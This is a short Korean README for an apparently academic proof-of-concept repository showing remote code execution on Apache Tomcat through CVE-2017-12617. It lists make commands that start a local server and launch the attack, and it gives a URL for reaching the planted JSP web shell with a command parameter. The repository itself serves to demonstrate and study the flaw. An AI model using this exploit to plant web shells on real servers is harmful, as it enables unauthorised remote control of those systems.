
개념 증명 - RCE 익스플로잇 : Apache Tomcat 웹 셸 - Ensimag 2018년 1월
이 Proof of Concept의 목적은 CVE-2017-12617을 사용하여 Apache Tomcat 서버를 원격으로 제어할 수 있는 방법을 보여주는 것입니다.
make server_up
make attack
이 명령이 브라우저를 열지 않으면 다음으로 이동할 수 있습니다:
http://localhost:8080/web_shell.jsp?cmd=pwd
이제 브라우저에서 서버의 웹 셸에 직접 접근할 수 있습니다.
이 Proof of Concept을 실행하는 데 문제가 있으면 https://github.com/ygouzerh/CVE-2017-12617/issues 에 이슈를 생성해 주세요. 최대한 빨리 답변해 드리겠습니다.